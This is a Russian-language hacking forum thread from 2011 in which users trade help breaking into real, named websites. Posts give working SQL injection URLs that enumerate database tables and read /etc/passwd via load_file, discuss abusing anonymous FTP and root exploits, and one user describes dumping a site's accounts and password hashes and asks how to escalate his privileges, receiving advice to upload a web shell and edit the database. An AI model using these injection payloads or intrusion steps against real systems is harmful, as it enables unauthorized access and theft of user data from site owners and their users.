
30.05.2011, 20:53
|
|
Новичок
Регистрация: 16.05.2011
Сообщений: 8
Провел на форуме: 2504
Репутация:
0
|
|
http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10+from+information_schema.tables+wher e+table_schema=0x616d656c69615f74657374 +--+
НЕ получается вывести таблицы имя базы amelia_test
|
|
|

30.05.2011, 21:13
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от kartes1984
http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10+from+information_schema.tables+wher e+table_schema=0x616d656c69615f74657374 +--+
НЕ получается вывести таблицы имя базы amelia_test
В ней нет нечего
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,count(*),7,8,9,10+from+i nformation_schema.tables+where+table_schema=0x616d 656c69615f74657374+--+
0
|
|
|

30.05.2011, 22:40
|
|
Новичок
Регистрация: 16.05.2011
Сообщений: 8
Провел на форуме: 2504
Репутация:
0
|
|
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+-+
opi8-база
omokage@localhos-пользователь
Как проверить есть ли у пользователя файловые привелегии?
|
|
|

30.05.2011, 22:49
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
вернул ноль:
Код:
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10--+
|
|
|

31.05.2011, 00:30
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме: 19069
Репутация:
0
|
|
на нужном сайте нашёл фтп доступ
шарясь по папкам и файлам конфига не нащёл.
шелл через браузер не залить
вот такой вопрос
а можно подключиться к этому же фтп через тотал команд или любой другой фтп софт
фтп вероятна без пароля? коль позволяет заходить через браузер и осматриваться
не в том направлении мыслю?
|
|
|

31.05.2011, 00:46
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Koren
зайти можно юзая любой фтп клиент, например filezilla
но это аккаунт анонимус, врятли будут права для заливки файлов
если серв на *Nix-e, то смотри в сторону рут сплоитов под данную фтпшку
|
|
|

31.05.2011, 04:09
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме: 1350
Репутация:
0
|
|
Код:
Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
« Error »
Etomite encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
PHP error debug
Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)
Error type/ Nr.: Warning - 2
File: /home/infosno/public_html/index.php
Line: 394
Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']);
Parser timing
MySQL: 0.0000 s s (0 Requests)
PHP: 0.6546 s s
Total: 0.6546 s s
Можно использовать эту ошибку как уязвимость? если да то можно пример...
|
|
|

31.05.2011, 04:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от foozzi
Код:
Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394
« Error »
Etomite encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
PHP error debug
Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157)
Error type/ Nr.: Warning - 2
File: /home/infosno/public_html/index.php
Line: 394
Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']);
Parser timing
MySQL: 0.0000 s s (0 Requests)
PHP: 0.6546 s s
Total: 0.6546 s s
Можно использовать эту ошибку как уязвимость? если да то можно пример...
Сайт вам сообщает, что не может вывести заголовки, поскольку они уже были выведены. Конечно там может что то есть, но из этой ошибки можно получить только раскрытие путей. Если переменные, преступаемые в header не фильтруются, то вполне возможно получить XSS.
|
|
|

31.05.2011, 17:07
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
Анализировал сайт через Webcruiser тот обнаружил пару уязвимостей,провел sql атаку и тут выдало всю Бд и Информацию о сервере,слил все аккаунты и хеши с паролями. Мне нужно повысить права доступа на своем аккаунте на том сайте,можно ли как нибуть редактировать БД? Mysql-5
Выглядит уязвимость так
Код:
_http://wow-hummer.com/account/index.php?modul=static&id=5
Кейворд: Игрового
|
|
|

31.05.2011, 17:15
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме: 866555
Репутация:
226
|
|
эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права
З.Ы. какой вопрос такой ответ
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|